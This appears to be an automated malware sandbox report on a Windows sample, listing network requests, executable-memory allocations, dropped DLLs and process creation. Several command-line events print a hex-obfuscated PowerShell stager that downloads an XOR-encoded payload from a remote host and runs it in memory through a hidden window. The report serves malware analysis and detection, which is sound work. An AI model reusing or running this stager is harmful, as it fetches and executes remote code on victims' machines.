Performs some HTTP requests (1 event)

request

GET http://vmi810830.contaboserver.net/local/cache-js/f93754e660802d7cc70924cceb4738ef.gz

Allocates read-write-execute memory (usually to unpack itself) (50 out of 178 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02be1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02be2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a98000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a9f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:49 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (7 events)

file	c:\Users\test22\AppData\Local\Temp\ztglqo2w.dll
file	c:\Users\test22\AppData\Local\Temp\zucfn5_i.dll
file	c:\Users\test22\AppData\Local\Temp\x_sns7up.dll
file	c:\Users\test22\AppData\Local\Temp\l9fffhn5.dll
file	c:\Users\test22\AppData\Local\Temp\hhisrn0v.dll
file	c:\Users\test22\AppData\Local\Temp\rktisogl.dll
file	c:\Users\test22\AppData\Local\Temp\8dsuuhnt.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"

cmdline

powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"

Drops an executable to the user AppData folder (7 events)

file	C:\Users\test22\AppData\Local\Temp\zucfn5_i.dll
file	C:\Users\test22\AppData\Local\Temp\rktisogl.dll
file	C:\Users\test22\AppData\Local\Temp\x_sns7up.dll
file	C:\Users\test22\AppData\Local\Temp\hhisrn0v.dll
file	C:\Users\test22\AppData\Local\Temp\8dsuuhnt.dll
file	C:\Users\test22\AppData\Local\Temp\ztglqo2w.dll
file	C:\Users\test22\AppData\Local\Temp\l9fffhn5.dll

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW May 25, 2023, 10:49 a.m.	thread_identifier: 2728 thread_handle: 0x00000088 process_identifier: 2724 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B2